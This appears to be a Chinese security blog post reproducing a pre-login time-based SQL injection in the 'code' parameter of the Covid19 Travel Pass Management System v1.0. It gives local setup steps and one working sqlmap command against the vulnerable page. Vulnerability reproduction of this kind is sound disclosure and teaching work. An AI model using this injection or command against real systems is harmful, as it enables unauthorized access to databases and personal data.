Covid19 旅行通行证管理系统是一个使用PHP和MySQL 数据库开发的基于 Web 的应用程序项目。此项目为用户提供了一个可以在 covid 19 的限制下提交旅行通行证的在线平台。该应用程序是使用 Bootstrap 和 AdminLTE 模板开发的。
其code参数未进行过滤,存在登录前SQL注入,本文对此漏洞进行复现。
Covid19 旅行通行证管理系统 v1.0
链接: https://pan.baidu.com/s/1dokC2FzsT6JYD1rhqn70zA提取码: cca9安装过程如下(可以使用本地web服务器,我这里用的mamp,也可以用xampp, lamp, wamp, phpstudy等):
-
在php.ini文件中启用GD 库。(我没启用也可以运行)
-
解压zip文件夹并将其粘贴到“htdocs”目录中。
-
创建一个名为 ctpms_db的新数据库。导入提供的SQL 文件。该文件名为 database/ctpms_db.sql 。
-
根据自身环境配置 initialize.php,这里贴出我的配置
-
访问即可
SQL时间盲注,可以看到sleep 5秒,才返回结果
sqlmap也可以直接跑出结果
python3 sqlmap.py -u "http://localhost:9202/ctpms_covid19/?page=view_pass&code=1" -p code --dbms mysql --batch
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Managementhttps://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html
本公众号内的文章及工具仅提供学习用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。
原文始发于微信公众号(我不是Hacker):Covid19 旅行通行证管理系统存在登陆前SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论